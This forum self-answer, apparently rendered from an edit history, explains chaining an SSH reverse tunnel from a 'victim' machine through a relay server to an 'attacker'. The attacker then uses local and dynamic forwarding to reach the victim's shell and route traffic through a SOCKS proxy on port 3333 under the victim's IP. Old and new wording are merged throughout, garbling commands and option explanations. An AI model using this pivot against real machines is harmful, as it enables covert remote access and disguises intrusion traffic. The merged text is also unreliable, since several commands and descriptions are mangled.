AppearantlyApparently nobody can answersanswer this questionsquestion, that's okay because I found the answer myself.
- On 'victim': ssh -N -f -R 5555:localhostvictim:22 -p <port_of_serv> <ip_of_serv>
ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
- On 'attacker' #1: ssh (-N -f) -L 4444:localhostattacker #1:5555 -p <port_of_serv> <ip_of_serv>
ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
- On 'attacker'attacker #2: ssh -p 4444 -D localhost:3333 user_on_victim@localhost
ssh -p 4444 -D localhost:3333 user_on_victim@localhost
- On 'attacker'attacker #3: in Firefox or irc, or even for the General network settings: Socks (v5) proxy settings: 127.0.0.1 port 3333
Every application you set the host localhost with port 3333 up for will be tunneled via serv to the victim and when you visit something like myip.comhttp://myip.com you'll see the ip/host of the victim. From here on you can even use GUI applications on the 'attacker' attacker (if you setup socks settings for the specific app or for the system as a whole) which will be tunneled via 'serv'serv to 'victim'victim and you'll act as the 'victim'victim as such.
The mistake I made in my thoughprocessthought process was that I didn't really understand the way the reversed port scheme looks like, I will try to explain it in simple terms.
Victim action
ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
-N
= I'm not going to run commands in the shell-f
= put the process in the background (so you can close the terminal window)-R
= reversed tunnel5555:localhost:22
= 5555 is the port on which serv internally is listening to put data forward to port 22 on victim. If you've setup victim to have ssh run on port 2222 you should change 22 to 2222.-p
= port on which ssh on serv is running.
1st attack action
ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>`
1st command:
TheThe 1st command you make on 'attacker'attacker (-L 4444:localhost:5555-L 4444:localhost:5555
) will set up a tunnel so that your connection with your 3rd command will be tunneled right thrue to 'victim'victim. (This is just for Dynamic port forwarding / Socks applications)
If
If you just want to have shell access on 'victim'victim instead of this command you just ssh in to serv & than run command: 'ssh user_on_victim@localhost -p 5555'. But
But we don't want shell access, we want to tunnel all data dynamiclydynamically so we have to make a portforwardport-forward.
Or the schematic explanation:
Or the schematic explanation
- -N
-L
= I'm not going to run commands in the shell - local port-f = put the process in the backgroundforwarding (so you can close the terminal windowon serv)
- -R = reversed tunnel
- 5555:localhost:22 = 5555 is the port on which serv internally is listening to
- 4444:localhost:5555
put all data forward to port '22' on 'victim'. If you've setup victim to have ssh runcoming in on port '2222' you should change '22'4444 to '2222'. - -p = port on which ssh on 'serv' is running5555.
2nd attack action
The 2nd command you make on 'attacker' (sshattacker
ssh -p 4444 -D localhost:3333 user_on_victim@localhost) is
is the actuallactual command thatsthat's going to initialise the connecting thruethrough the 2 tunnels. What you do is you say: connect to port 4444 and put all the data thats commingthat's coming in on (localhost port 3333) to 4444. (which will be put thruethrough locally on 'serv'serv to port 5555 -> which will be pushed out to port 22 on 'victim'victim.
Or the schematic explanation:
Or the schematic explanation
- -L
-D
= local portforwarding (on 'serv')Dynamic forwarding -
- 4444:localhost:5555 put all data comming in on port 4444 to port 5555.
localhost:3333
= listen on port 3333 and push data through ssh connection to port 4444 to serv. -p 4444
= the port on which serv is listening to put the data forward to port 5555 and than out to port 22 on victim.
3rd attack action
Setup your applications or even your entire system to use SOCKS (v5) proxy server on address: localhost port: 3333. It does not matter on which ports these applications run normally because that will be handled by the proxy server. In theory every application can run via socks proxy dynamic port forwarding. You'll only have to set it up. :)
The 3rd action on 'attacker'attacker is the actual data you're going to tunnel to 'victim'victim. It does not matter what data or application this is, that's why it's dynamic forwarding, it does not matter on which ports these application run because that will be handled by SOCKS.
Or the schematic explanation:
- -D = Dynamic forwarding
- localhost:3333 = listen on port 3333 and push data thrue ssh connnection to port 4444 to serv.
- -p 4444 = the port on which 'serv' is listening to put the data forward to port 5555 and than out to port 22 on 'victim'.
Last thing you have to do:
- Setup your applications or even your entire system to use SOCKS (v5) proxy server on address: localhost port: 3333. It does not matter on which ports these applications run normally because that will be handled by the proxy server. In theory every application can run via socks proxy dynamic port forwarding. You'll only have to set it up. :)